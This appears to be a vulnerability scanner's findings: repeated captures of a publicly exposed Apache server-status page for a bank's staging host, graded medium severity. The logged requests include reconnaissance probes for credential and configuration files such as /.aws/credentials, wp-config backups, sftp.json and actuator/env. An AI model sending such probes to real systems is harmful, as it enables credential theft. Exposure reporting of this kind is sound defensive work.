0.0011803950218130.00.009.64 127.0.0.1http/1.1127.0.1.1:8080POST /web/debug/default/view HTTP/1.1 0-58-0/0/1138. 0.0011803950166610.00.004.84 127.0.0.1http/1.1127.0.1.1:8080POST /debug/default/view?panel=config HTTP/1.1 0-58-0/0/1144. 0.0011803950127130.00.004.36 127.0.0.1http/1.1127.0.1.1:8080POST /wp-config.php-backup HTTP/1.1 0-58-0/0/1106. 0.0011803950131870.00.003.51 127.0.0.1http/1.1127.0.1.1:8080POST /tool/view/phpinfo.view.php HTTP/1.1 1-7212749430/52/1954_ 4.80130938290.01.0914.26 127.0.0.1http/1.1127.0.1.1:8080POST /api/graphql HTTP/1.1 1-7212749430/52/1890_ 4.8150837720.00.6214.40 127.0.0.1http/1.1127.0.1.1:8080GET /api/swagger.json HTTP/1.1 1-72127494324/47/1832W 4.6900754740.00.5612.87 127.0.0.1http/1.1127.0.1.1:8080GET /server-status HTTP/1.1 1-7212749430/50/1944_ 4.80140961730.00.6813.74 127.0.0.1http/1.1127.0.1.1:8080POST /graphql HTTP/1.1 1-7212749430/47/1916_ 4.8120873780.00.4614.34 127.0.0.1http/1.1127.0.1.1:8080GET /.vscode/sftp.json HTTP/1.1 1-7212749430/50/1883_ 4.8080810110.00.4616.53 127.0.0.1http/1.1127.0.1.1:8080GET /swagger.json HTTP/1.1 1-7212749430/48/1919_ 4.81301248750.00.6613.09 127.0.0.1http/1.1127.0.1.1:8080GET /actuator/env HTTP/1.1 1-7212749430/48/1911_ 4.6586951858720.00.6513.66 127.0.0.1http/1.1centralrefonte.projet-client.coGET / HTTP/1.1 1-7212749430/49/1843_ 4.8170872290.00.9313.29 127.0.0.1http/1.1127.0.1.1:8080GET /v2/api-docs HTTP/1.1 1-7212749430/43/1902_ 4.80110723220.00.8213.02 127.0.0.1http/1.1127.0.1.1:8080GET /swagger-ui.html HTTP/1.1 1-7212749430/53/1937_ 4.8090954230.00.6916.06 127.0.0.1http/1.1127.0.1.1:8080GET /webjars/swagger-ui/index.html HTTP/1.1 1-7212749430/53/1875_ 4.8070813660.01.3713.05 127.0.0.1http/1.1127.0.1.1:8080GET /swagger/v1/swagger.json HTTP/1.1 1-7212749430/49/1949_ 4.801201070960.00.4813.29 127.0.0.1http/1.1127.0.1.1:8080POST /api/gql HTTP/1.1 1-7212749430/52/1926_ 4.8090951570.00.5715.17 127.0.0.1http/1.1127.0.1.1:8080GET /swagger/swagger-ui.html HTTP/1.1 1-7212749430/52/1900_ 4.81501196170.01.1114.27 127.0.0.1http/1.1127.0.1.1:8080GET /api-docs/swagger.json HTTP/1.1 1-7212749430/57/1951_ 4.8200981480.00.5813.97 127.0.0.1http/1.1127.0.1.1:8080GET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor 1-7212749430/51/1909_ 4.8160755180.00.9612.44 127.0.0.1http/1.1127.0.1.1:8080GET /v3/api-docs HTTP/1.1 1-7212749430/57/1893_ 4.80120839410.00.6012.04 127.0.0.1http/1.1127.0.1.1:8080POST /graphql/api HTTP/1.1 1-7212749430/44/1887_ 4.8200779980.01.0712.96 127.0.0.1http/1.1127.0.1.1:8080GET /v2/_catalog HTTP/1.1 1-7212749430/57/1924_ 4.8120798140.00.9013.15 127.0.0.1http/1.1127.0.1.1:8080GET /about HTTP/1.1 1-7212749430/49/1859_ 4.80100875110.00.8714.29 127.0.0.1http/1.1127.0.1.1:8080GET /swagger/index.html HTTP/1.1 1-7212749430/53/1890_ 4.80140796490.00.5713.28 127.0.0.1http/1.1127.0.1.1:8080POST /api HTTP/1.1 1-7212749430/55/1951_ 4.8130757010.00.7014.70 127.0.0.1http/1.1127.0.1.1:8080GET /server HTTP/1.1 1-7212749430/46/1891_ 4.8140820050.00.5912.61 127.0.0.1http/1.1127.0.1.1:8080GET /@vite/env HTTP/1.1 1-7212749430/56/1907_ 4.8110823790.00.6613.10 127.0.0.1http/1
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb31c9c7b251c9c7b2512b07b755
Apache Status Apache Server Status for www.algerie.stagingirb.bnpparibas (via 127.0.0.1) Server Version: Apache/2.4.65 (Debian) OpenSSL/1.1.1w Server MPM: event Server Built: 2025-07-29T20:18:46 Current Time: Monday, 10-Nov-2025 15:58:41 CET Restart Time: Tuesday, 02-Sep-2025 12:14:26 CEST Parent Server Config. Generation: 71 Parent Server MPM Generation: 70 Server uptime: 69 days 4 hours 44 minutes 14 seconds Server load: 0.17 0.14 0.10 Total accesses: 139381 - Total Traffic: 832.1 MB - Total Duration: 4063203 CPU Usage: u174.61 s243.43 cu230.84 cs76.87 - .0121% CPU load .0233 requests/sec - 145 B/second - 6.1 kB/request - 29.1518 ms/request 1 requests currently being processed, 0 workers gracefully restarting, 49 idle workers SlotPIDStoppingConnections ThreadsAsync connections totalacceptingbusygracefulidlewait-iowritingkeep-aliveclosing 1701631no1yes10240010 2701630no0yes00250000 Sum201 10490010 .........................____________W__________________________ ___________..................................................... ...................... Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqDurConnChildSlotClientProtocolVHostRequest 0-58-0/0/1137. 0.0010079170129060.00.003.89 127.0.0.1http/1.1127.0.1.1:8080POST /debug/default/view?panel=config HTTP/1.1 0-58-0/0/1165. 0.0010079170150680.00.004.12 127.0.0.1http/1.1127.0.1.1:8080POST /debug/default/view?panel=config HTTP/1.1 0-58-0/0/1148. 0.0010079170126900.00.003.69 127.0.0.1http/1.1127.0.1.1:8080GET /symfony/public/_profiler/phpinfo HTTP/1.1 0-58-0/0/1134. 0.0010079170142600.00.005.54 127.0.0.1http/1.1127.0.1.1:8080POST /sapi/debug/default/view HTTP/1.1 0-58-0/0/1161. 0.0010079170230570.00.003.77 127.0.0.1http/1.1127.0.1.1:8080POST /phpinfo HTTP/1.1 0-58-0/0/1152. 0.0010079170354990.00.005.74 127.0.0.1http/1.1127.0.1.1:8080POST /debug/default/view HTTP/1.1 0-58-0/0/1186. 0.0010079170183540.00.0019.75 127.0.0.1http/1.1127.0.1.1:8080GET /aws.yml HTTP/1.1 0-58-0/0/1154. 0.0010079170183980.00.0025.62 127.0.0.1http/1.1127.0.1.1:8080GET /.aws/credentials HTTP/1.1 0-58-0/0/1153. 0.0010079170156410.00.004.08 127.0.0.1http/1.1127.0.1.1:8080POST /debug/default/view?panel=config/frontend_dev.php HTTP/1.1 0-58-0/0/1142. 0.0010079170112340.00.004.25 127.0.0.1http/1.1127.0.1.1:8080POST /frontend/web/debug/default/view HTTP/1.1 0-58-0/0/1131. 0.001007917298810.00.005.05 127.0.0.1http/1.1127.0.1.1:8080GET / HTTP/1.1 0-58-0/0/1132. 0.0010079171342330.00.0025.63 127.0.0.1http/1.1127.0.1.1:8080GET / HTTP/1.1 0-58-0/0/1127. 0.0010079170149300.00.004.83 127.0.0.1http/1.1127.0.1.1:8080GET /config.js HTTP/1.1 0-58-0/0/1147. 0.0010079170533170.00.004.76 127.0.0.1http/1.1127.0.1.1:8080POST /.aws/credentials HTTP/1.1 0-58-0/0/1125. 0.0010079172135190.00.0012.44 127.0.0.1http/1.1127.0.1.1:8080GET /server-status?auto HTTP/1.1 0-58-0/0/1145. 0.0010079170108150.00.003.36 127.0.0.1http/1.1127.0.1.1:8080GET / HTTP/1.1 0-58-0/0/1143. 0.0010079170105370.00.004.57 127.0.0.1http/1.1127.0.1.1:8080POST /config/aws.yml HTTP/1.1 0-58-0/0/1127. 0.0010079170188130.00.0012.96 127.0.0.1http/1.1127.0.1.1:8080POST /%C0 HTTP/1.1 0-58-0/0/1129. 0.0010079171115990.00.003.39 127.0.0.1http/1.1127.0.1.1:8080POST / HTTP/1.1 0-58-0/0/1139. 0.0010079170116320.00.0017.03 127.0.0.1http/1.1127.0.1.1:8080POST /symfony/public/_profiler/phpinfo HTTP/1.1 0-58-0/0/1127. 0.0010079170138610.00.004.74 127.0.0.1http/1.1127.0.1.1:8080GET /debug/default/view?panel=config/frontend_dev.php HTTP/1.1 0-58-0/0/1124. 0.0010079170218130.00.009.64 127.0.0.1http/1.1127.0.1.1:8080POST /web/debug/default/view HTTP/1.1 0-58-0/0/1138. 0.0010079170166610.00.004.84 127.0.0.1http/1.1127.0.1.1:8080POST /debug/default/view?panel=config HTTP/1.1 0-58-0/0/1144. 0.0010079170127130.00.004.36 127.0.0.1http/1.1127.0.1.1:8080POST /wp-config.php-backup HTTP/1.1 0-58-0/0/1106. 0.0010079170131870.00.003.51 127.0.0.1http/1.1127.0.1.1:8080POST /tool/view/phpinfo.view.php HTTP/1.1 1-707016310/22/1783_ 1.7920797380.00.1710.94 127.0.0.1http/1.1127.0.1.1:8080GET /server HTTP/1.1 1-707016310/26/1732_ 1.7920685620.00.2511.53 127.0.0.1http/1.1127.0.1.1:8080GET /.vscode/sftp.json HTTP/1.1 1-707016310/25/1694_ 1.77100662310.00.3011.61 127.0.0.1http/1.1127.0.1.1:8080POST /api/gql HTTP/1.1 1-707016310/23/1777_ 1.7760786820.00.1711.98 127.0.0.1http/1.1127.0.1.1:8080GET /swagger/v1/swagger.json HTTP/1.1 1-707016310/27/1754_ 1.7750667000.00.1412.54 127.0.0.1http/1.1127.0.1.1:8080GET /v3/api-docs HTTP/1.1 1-707016310/23/1730_ 1.7750648020.00.3915.02 127.0.0.1http/1.1127.0.1.1:8080GET /v2/api-docs HTTP/1.1 1-707016310/22/1757_ 1.77901065330.00.1210.78 127.0.0.1http/1.1127.0.1.1:8080GET /swagger-ui.html HTTP/1.1 1-707016310/25/1758_ 1.7770708480.00.3112.25 127.0.0.1http/1.1127.0.1.1:8080GET /swagger.json HTTP/1.1 1-707016310/22/1693_ 1.66810745210.00.1811.48 127.0.0.1http/1.1centralrefonte.projet-client.coGET /algerie/wp-includes/js/tinymce/plugins/tabfocus/plugin.min 1-707016310/29/1764_ 1.7900601450.00.4211.30 127.0.0.1http/1.1127.0.1.1:8080GET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor 1-707016310/27/1764_ 1.7930810120.00.8114.26 127.0.0.1http/1.1127.0.1.1:8080GET /actuator/env HTTP/1.1 1-707016310/22/1710_ 1.7840674130.00.2310.61 127.0.0.1http/1.1127.0.1.1:8080GET /api-docs/swagger.json HTTP/1.1 1-7070163124/21/1798W 1.7700904450.00.1412.07 127.0.0.1http/1.1127.0.1.1:8080GET /server-status HTTP/1.1 1-707016310/19/1752_ 1.7840729680.00.1413.66 127.0.0.1http/1.1127.0.1.1:8080GET /api/swagger.json HTTP/1.1 1-707016310/28/1741_ 1.771101082110.00.1512.09 127.0.0.1http/1.1127.0.1.1:8080POST /graphql/api HTTP/1.1 1-707016310/26/1776_ 1.7790782310.00.2712.31 127.0.0.1http/1.1127.0.1.1:8080GET /swagger/index.html HTTP/1.1 1-707016310/23/1754_ 1.77110614210.00.3010.45 127.0.0.1http/1.1127.0.1.1:8080POST /api/graphql HTTP/1.1 1-707016310/23/1725_ 1.77120651030.00.1210.45 127.0.0.1http/1.1127.0.1.1:8080POST /api HTTP/1.1 1-707016310/21/1730_ 1.7900545290.00.0610.81 127.0.0.1http/1.1127.0.1.1:8080GET /v2/_catalog HTTP/1.1 1-707016310/28/1757_ 1.7770653110.00.3911.18 127.0.0.1http/1.1127.0.1.1:8080GET /webjars/swagger-ui/index.html HTTP/1.1 1-707016310/22/1699_ 1.7780724720.00.2012.24 127.0.0.1http/1.1127.0.1.1:8080GET /swagger/swagger-ui.html HTTP/1.1 1-707016310/23/1728_ 1.768376652520.00.2311.24 127.0.0.1http/1.1centralrefonte.projet-client.coPOST /algerie/wp-admin/admin-ajax.php HTTP/1.1 1-707016310/25/1776_ 1.7830617070.00.2012.90 127.0.0.1http/1.1127.0.1.1:8080GET /@vite/env HTTP/1.1 1-707016310/21/1733_ 1.7910650780.00.1510.56 127.0.0.1http/1.1127.0.1.1:8080GET /debug/default/view?panel=config HTTP/1.1 1-707016310/22/1739_ 1.7910
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb31c9c7b251c9c7b2515e0bbe29
Apache Status Apache Server Status for www.algerie.stagingirb.bnpparibas (via 127.0.0.1) Server Version: Apache/2.4.65 (Debian) OpenSSL/1.1.1w Server MPM: event Server Built: 2025-07-29T20:18:46 Current Time: Saturday, 08-Nov-2025 13:27:14 CET Restart Time: Tuesday, 02-Sep-2025 12:14:26 CEST Parent Server Config. Generation: 69 Parent Server MPM Generation: 68 Server uptime: 67 days 2 hours 12 minutes 48 seconds Server load: 0.00 0.01 0.00 Total accesses: 135608 - Total Traffic: 814.5 MB - Total Duration: 4002706 CPU Usage: u167.63 s235.68 cu226.25 cs75.12 - .0122% CPU load .0234 requests/sec - 147 B/second - 6.1 kB/request - 29.5167 ms/request 1 requests currently being processed, 0 workers gracefully restarting, 49 idle workers SlotPIDStoppingConnections ThreadsAsync connections totalacceptingbusygracefulidlewait-iowritingkeep-aliveclosing 1318546no0yes10240000 2318545no0yes00250000 Sum200 10490000 ........................._______________W_______________________ ___________..................................................... ...................... Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqDurConnChildSlotClientProtocolVHostRequest 0-58-0/0/1137. 0.008260310129060.00.003.89 127.0.0.1http/1.1127.0.1.1:8080POST /debug/default/view?panel=config HTTP/1.1 0-58-0/0/1165. 0.008260310150680.00.004.12 127.0.0.1http/1.1127.0.1.1:8080POST /debug/default/view?panel=config HTTP/1.1 0-58-0/0/1148. 0.008260310126900.00.003.69 127.0.0.1http/1.1127.0.1.1:8080GET /symfony/public/_profiler/phpinfo HTTP/1.1 0-58-0/0/1134. 0.008260310142600.00.005.54 127.0.0.1http/1.1127.0.1.1:8080POST /sapi/debug/default/view HTTP/1.1 0-58-0/0/1161. 0.008260310230570.00.003.77 127.0.0.1http/1.1127.0.1.1:8080POST /phpinfo HTTP/1.1 0-58-0/0/1152. 0.008260310354990.00.005.74 127.0.0.1http/1.1127.0.1.1:8080POST /debug/default/view HTTP/1.1 0-58-0/0/1186. 0.008260310183540.00.0019.75 127.0.0.1http/1.1127.0.1.1:8080GET /aws.yml HTTP/1.1 0-58-0/0/1154. 0.008260310183980.00.0025.62 127.0.0.1http/1.1127.0.1.1:8080GET /.aws/credentials HTTP/1.1 0-58-0/0/1153. 0.008260310156410.00.004.08 127.0.0.1http/1.1127.0.1.1:8080POST /debug/default/view?panel=config/frontend_dev.php HTTP/1.1 0-58-0/0/1142. 0.008260310112340.00.004.25 127.0.0.1http/1.1127.0.1.1:8080POST /frontend/web/debug/default/view HTTP/1.1 0-58-0/0/1131. 0.00826031298810.00.005.05 127.0.0.1http/1.1127.0.1.1:8080GET / HTTP/1.1 0-58-0/0/1132. 0.008260311342330.00.0025.63 127.0.0.1http/1.1127.0.1.1:8080GET / HTTP/1.1 0-58-0/0/1127. 0.008260310149300.00.004.83 127.0.0.1http/1.1127.0.1.1:8080GET /config.js HTTP/1.1 0-58-0/0/1147. 0.008260310533170.00.004.76 127.0.0.1http/1.1127.0.1.1:8080POST /.aws/credentials HTTP/1.1 0-58-0/0/1125. 0.008260312135190.00.0012.44 127.0.0.1http/1.1127.0.1.1:8080GET /server-status?auto HTTP/1.1 0-58-0/0/1145. 0.008260310108150.00.003.36 127.0.0.1http/1.1127.0.1.1:8080GET / HTTP/1.1 0-58-0/0/1143. 0.008260310105370.00.004.57 127.0.0.1http/1.1127.0.1.1:8080POST /config/aws.yml HTTP/1.1 0-58-0/0/1127. 0.008260310188130.00.0012.96 127.0.0.1http/1.1127.0.1.1:8080POST /%C0 HTTP/1.1 0-58-0/0/1129. 0.008260311115990.00.003.39 127.0.0.1http/1.1127.0.1.1:8080POST / HTTP/1.1 0-58-0/0/1139. 0.008260310116320.00.0017.03 127.0.0.1http/1.1127.0.1.1:8080POST /symfony/public/_profiler/phpinfo HTTP/1.1 0-58-0/0/1127. 0.008260310138610.00.004.74 127.0.0.1http/1.1127.0.1.1:8080GET /debug/default/view?panel=config/frontend_dev.php HTTP/1.1 0-58-0/0/1124. 0.008260310218130.00.009.64 127.0.0.1http/1.1127.0.1.1:8080POST /web/debug/default/view HTTP/1.1 0-58-0/0/1138. 0.008260310166610.00.004.84 127.0.0.1http/1.1127.0.1.1:8080POST /debug/default/view?panel=config HTTP/1.1 0-58-0/0/1144. 0.008260310127130.00.004.36 127.0.0.1http/1.1127.0.1.1:8080POST /wp-config.php-backup HTTP/1.1 0-58-0/0/1106. 0.008260310131870.00.003.51 127.0.0.1http/1.1127.0.1.1:8080POST /tool/view/phpinfo.view.php HTTP/1.1 1-683185460/17/1709_ 0.7700782990.00.0610.67 127.0.0.1http/1.1127.0.1.1:8080GET /v3/api-docs HTTP/1.1 1-683185460/10/1654_ 0.7700677840.00.0311.21 127.0.0.1http/1.1127.0.1.1:8080GET /server HTTP/1.1 1-683185460/9/1614_ 0.7700655000.00.0211.23 127.0.0.1http/1.1127.0.1.1:8080GET /v2/api-docs HTTP/1.1 1-683185460/12/1697_ 0.7700781130.00.0511.72 127.0.0.1http/1.1127.0.1.1:8080GET /actuator/env HTTP/1.1 1-683185460/9/1669_ 0.7610664600.00.0212.31 127.0.0.1http/1.1127.0.1.1:8080GET /webjars/swagger-ui/index.html HTTP/1.1 1-683185460/10/1660_ 0.7710641040.00.0414.55 127.0.0.1http/1.1127.0.1.1:8080GET /swagger/v1/swagger.json HTTP/1.1 1-683185460/17/1686_ 0.76101062400.00.0510.59 127.0.0.1http/1.1127.0.1.1:8080POST /graphql/api HTTP/1.1 1-683185460/9/1682_ 0.7700657180.01.0111.88 127.0.0.1http/1.1127.0.1.1:8080GET /api/swagger.json HTTP/1.1 1-683185460/12/1624_ 0.7700743080.00.7711.23 127.0.0.1http/1.1127.0.1.1:8080GET /api-docs/swagger.json HTTP/1.1 1-683185460/12/1689_ 0.7700597750.00.0510.82 127.0.0.1http/1.1127.0.1.1:8080GET /about HTTP/1.1 1-683185460/17/1679_ 0.7700800870.00.1513.35 127.0.0.1http/1.1127.0.1.1:8080GET /@vite/env HTTP/1.1 1-683185460/17/1635_ 0.7700660760.00.0410.29 127.0.0.1http/1.1127.0.1.1:8080GET /.vscode/sftp.json HTTP/1.1 1-683185460/9/1730_ 0.7700859360.00.0411.86 127.0.0.1http/1.1127.0.1.1:8080GET /debug/default/view?panel=config HTTP/1.1 1-683185460/16/1674_ 0.7700719350.00.0313.42 127.0.0.1http/1.1127.0.1.1:8080GET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor 1-683185460/14/1656_ 0.77001069580.00.0411.87 127.0.0.1http/1.1127.0.1.1:8080GET /v2/_catalog HTTP/1.1 1-6831854625/8/1689W 0.7000767240.00.0111.94 127.0.0.1http/1.1127.0.1.1:8080GET /server-status HTTP/1.1 1-683185460/11/1671_ 0.7620573240.00.0510.04 127.0.0.1http/1.1127.0.1.1:8080GET / HTTP/1.1 1-683185460/17/1651_ 0.7710647300.00.0510.26 127.0.0.1http/1.1127.0.1.1:8080GET /swagger.json HTTP/1.1 1-683185460/10/1655_ 0.7610540380.00.0110.67 127.0.0.1http/1.1127.0.1.1:8080POST /api/graphql HTTP/1.1 1-683185460/9/1672_ 0.7610639180.00.0210.72 127.0.0.1http/1.1127.0.1.1:8080GET /swagger/swagger-ui.html HTTP/1.1 1-683185460/16/1627_ 0.7620722670.00.0311.94 127.0.0.1http/1.1127.0.1.1:8080POST /graphql HTTP/1.1 1-683185460/8/1649_ 0.7610642940.00.0310.92 127.0.0.1http/1.1127.0.1.1:8080GET /swagger-ui.html HTTP/1.1 1-683185460/9/1692_ 0.7610613080.00.0412.61 127.0.0.1http/1.1127.0.1.1:8080POST /api HTTP/1.1 1-683185460/8/1654_ 0.7610594250.00.0410.31 127.0.0.1http/1.1127.0.1.1:8080POST /api/gql HTTP/1.1 1-683185460/17/1662_ 0.7610693360.00.0510.98 127.0.0.1http/1.1127.0.1.1:8080GET /swagger/index.html HTTP
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb31c9c7b251c9c7b251bf88d6af
Apache Status Apache Server Status for www.algerie.stagingirb.bnpparibas (via 127.0.0.1) Server Version: Apache/2.4.65 (Debian) OpenSSL/1.1.1w Server MPM: event Server Built: 2025-07-29T20:18:46 Current Time: Tuesday, 04-Nov-2025 17:56:50 CET Restart Time: Tuesday, 02-Sep-2025 12:14:26 CEST Parent Server Config. Generation: 65 Parent Server MPM Generation: 64 Server uptime: 63 days 6 hours 42 minutes 23 seconds Server load: 0.00 0.00 0.00 Total accesses: 116946 - Total Traffic: 640.5 MB - Total Duration: 2968920 CPU Usage: u169.43 s225.67 cu185.69 cs63.67 - .0118% CPU load .0214 requests/sec - 122 B/second - 5.6 kB/request - 25.3871 ms/request 1 requests currently being processed, 0 workers gracefully restarting, 49 idle workers SlotPIDStoppingConnections ThreadsAsync connections totalacceptingbusygracefulidlewait-iowritingkeep-aliveclosing 13753463no0yes10240000 23753462no0yes00250000 Sum200 10490000 ........................._____________________W_________________ ___________..................................................... ...................... Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqDurConnChildSlotClientProtocolVHostRequest 0-58-0/0/1137. 0.004966060129060.00.003.89 127.0.0.1http/1.1127.0.1.1:8080POST /debug/default/view?panel=config HTTP/1.1 0-58-0/0/1165. 0.004966060150680.00.004.12 127.0.0.1http/1.1127.0.1.1:8080POST /debug/default/view?panel=config HTTP/1.1 0-58-0/0/1148. 0.004966060126900.00.003.69 127.0.0.1http/1.1127.0.1.1:8080GET /symfony/public/_profiler/phpinfo HTTP/1.1 0-58-0/0/1134. 0.004966060142600.00.005.54 127.0.0.1http/1.1127.0.1.1:8080POST /sapi/debug/default/view HTTP/1.1 0-58-0/0/1161. 0.004966060230570.00.003.77 127.0.0.1http/1.1127.0.1.1:8080POST /phpinfo HTTP/1.1 0-58-0/0/1152. 0.004966060354990.00.005.74 127.0.0.1http/1.1127.0.1.1:8080POST /debug/default/view HTTP/1.1 0-58-0/0/1186. 0.004966060183540.00.0019.75 127.0.0.1http/1.1127.0.1.1:8080GET /aws.yml HTTP/1.1 0-58-0/0/1154. 0.004966060183980.00.0025.62 127.0.0.1http/1.1127.0.1.1:8080GET /.aws/credentials HTTP/1.1 0-58-0/0/1153. 0.004966060156410.00.004.08 127.0.0.1http/1.1127.0.1.1:8080POST /debug/default/view?panel=config/frontend_dev.php HTTP/1.1 0-58-0/0/1142. 0.004966060112340.00.004.25 127.0.0.1http/1.1127.0.1.1:8080POST /frontend/web/debug/default/view HTTP/1.1 0-58-0/0/1131. 0.00496606298810.00.005.05 127.0.0.1http/1.1127.0.1.1:8080GET / HTTP/1.1 0-58-0/0/1132. 0.004966061342330.00.0025.63 127.0.0.1http/1.1127.0.1.1:8080GET / HTTP/1.1 0-58-0/0/1127. 0.004966060149300.00.004.83 127.0.0.1http/1.1127.0.1.1:8080GET /config.js HTTP/1.1 0-58-0/0/1147. 0.004966060533170.00.004.76 127.0.0.1http/1.1127.0.1.1:8080POST /.aws/credentials HTTP/1.1 0-58-0/0/1125. 0.004966062135190.00.0012.44 127.0.0.1http/1.1127.0.1.1:8080GET /server-status?auto HTTP/1.1 0-58-0/0/1145. 0.004966060108150.00.003.36 127.0.0.1http/1.1127.0.1.1:8080GET / HTTP/1.1 0-58-0/0/1143. 0.004966060105370.00.004.57 127.0.0.1http/1.1127.0.1.1:8080POST /config/aws.yml HTTP/1.1 0-58-0/0/1127. 0.004966060188130.00.0012.96 127.0.0.1http/1.1127.0.1.1:8080POST /%C0 HTTP/1.1 0-58-0/0/1129. 0.004966061115990.00.003.39 127.0.0.1http/1.1127.0.1.1:8080POST / HTTP/1.1 0-58-0/0/1139. 0.004966060116320.00.0017.03 127.0.0.1http/1.1127.0.1.1:8080POST /symfony/public/_profiler/phpinfo HTTP/1.1 0-58-0/0/1127. 0.004966060138610.00.004.74 127.0.0.1http/1.1127.0.1.1:8080GET /debug/default/view?panel=config/frontend_dev.php HTTP/1.1 0-58-0/0/1124. 0.004966060218130.00.009.64 127.0.0.1http/1.1127.0.1.1:8080POST /web/debug/default/view HTTP/1.1 0-58-0/0/1138. 0.004966060166610.00.004.84 127.0.0.1http/1.1127.0.1.1:8080POST /debug/default/view?panel=config HTTP/1.1 0-58-0/0/1144. 0.004966060127130.00.004.36 127.0.0.1http/1.1127.0.1.1:8080POST /wp-config.php-backup HTTP/1.1 0-58-0/0/1106. 0.004966060131870.00.003.51 127.0.0.1http/1.1127.0.1.1:8080POST /tool/view/phpinfo.view.php HTTP/1.1 1-6437534630/244/1320_ 10.3600531790.01.777.60 127.0.0.1http/1.1127.0.1.1:8080GET /v3/api-docs HTTP/1.1 1-6437534630/238/1270_ 10.3610402660.01.577.02 127.0.0.1http/1.1127.0.1.1:8080GET /v2/api-docs HTTP/1.1 1-6437534630/235/1239_ 10.3610464760.01.767.54 127.0.0.1http/1.1127.0.1.1:8080GET /swagger/swagger-ui.html HTTP/1.1 1-6437534630/249/1318_ 10.3700511150.01.967.80 127.0.0.1http/1.1127.0.1.1:8080GET /@vite/env HTTP/1.1 1-6437534630/243/1292_ 10.3700545890.02.068.94 127.0.0.1http/1.1127.0.1.1:8080GET /actuator/env HTTP/1.1 1-6437534630/236/1275_ 10.3700470490.01.8010.05 127.0.0.1http/1.1127.0.1.1:8080GET /server HTTP/1.1 1-6437534630/235/1283_ 10.3700467470.01.756.75 127.0.0.1http/1.1127.0.1.1:8080GET /.vscode/sftp.json HTTP/1.1 1-6437534630/238/1298_ 10.3610484200.01.637.08 127.0.0.1http/1.1127.0.1.1:8080GET /swagger.json HTTP/1.1 1-6437534630/243/1252_ 10.3610427640.01.546.62 127.0.0.1http/1.1127.0.1.1:8080POST /api HTTP/1.1 1-6437534630/241/1317_ 10.3610420860.01.747.53 127.0.0.1http/1.1127.0.1.1:8080POST /graphql HTTP/1.1 1-6437534630/249/1301_ 10.3610598500.01.919.23 127.0.0.1http/1.1127.0.1.1:8080GET /swagger/index.html HTTP/1.1 1-6437534630/244/1258_ 10.3700483230.01.747.30 127.0.0.1http/1.1127.0.1.1:8080GET /v2/_catalog HTTP/1.1 1-6437534630/246/1344_ 10.3620516250.01.657.82 127.0.0.1http/1.1127.0.1.1:8080GET / HTTP/1.1 1-6437534630/242/1286_ 10.3610555190.01.639.21 127.0.0.1http/1.1127.0.1.1:8080GET /swagger-ui.html HTTP/1.1 1-6437534630/248/1279_ 10.3610827780.01.868.00 127.0.0.1http/1.1127.0.1.1:8080GET /swagger/v1/swagger.json HTTP/1.1 1-6437534630/245/1318_ 10.3700582100.02.169.01 127.0.0.1http/1.1127.0.1.1:8080GET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor 1-6437534630/246/1285_ 10.3610418720.01.747.21 127.0.0.1http/1.1127.0.1.1:8080POST /api/gql HTTP/1.1 1-6437534630/239/1260_ 10.3610434780.01.766.96 127.0.0.1http/1.1127.0.1.1:8080GET /webjars/swagger-ui/index.html HTTP/1.1 1-6437534630/242/1281_ 10.3700400060.01.877.33 127.0.0.1http/1.1127.0.1.1:8080GET /api/swagger.json HTTP/1.1 1-6437534630/232/1295_ 10.3610484650.01.807.70 127.0.0.1http/1.1127.0.1.1:8080POST /api/graphql HTTP/1.1 1-6437534630/235/1243_ 10.3610448390.02.088.53 127.0.0.1http/1.1127.0.1.1:8080POST /graphql/api HTTP/1.1 1-64375346325/248/1274W 10.3400506700.01.717.63 127.0.0.1http/1.1127.0.1.1:8080GET /server-status HTTP/1.1 1-6437534630/235/1305_ 10.3600457760.01.769.40 127.0.0.1http/1.1127.0.1.1:8080GET /api-docs/swagger.json HTTP/1.1 1-6437534630/244/1274_ 10.3700341840.01.666.87 127.0.0.1http/1.1127.0.1.1:8080GET /debug/default/view?panel=config HTTP/1.1 1-6437534630/244/1283_ 10.3700558440.02.057.02 127.0.0.1http/1.1</
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb31c9c7b251c9c7b251bcc95abe
Apache Status Apache Server Status for www.algerie.stagingirb.bnpparibas (via 127.0.0.1) Server Version: Apache/2.4.65 (Debian) OpenSSL/1.1.1w Server MPM: event Server Built: 2025-07-29T20:18:46 Current Time: Sunday, 02-Nov-2025 22:10:52 CET Restart Time: Tuesday, 02-Sep-2025 12:14:26 CEST Parent Server Config. Generation: 63 Parent Server MPM Generation: 62 Server uptime: 61 days 10 hours 56 minutes 25 seconds Server load: 0.00 0.00 0.00 Total accesses: 103896 - Total Traffic: 531.7 MB - Total Duration: 1873432 CPU Usage: u154.57 s216.45 cu174.19 cs60.61 - .0114% CPU load .0196 requests/sec - 104 B/second - 5.2 kB/request - 18.0318 ms/request 1 requests currently being processed, 0 workers gracefully restarting, 49 idle workers SlotPIDStoppingConnections ThreadsAsync connections totalacceptingbusygracefulidlewait-iowritingkeep-aliveclosing 13340699no0yes00250000 23340697no1yes10240010 Sum201 10490010 ........................._______________________________________ ____W______..................................................... ...................... Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU 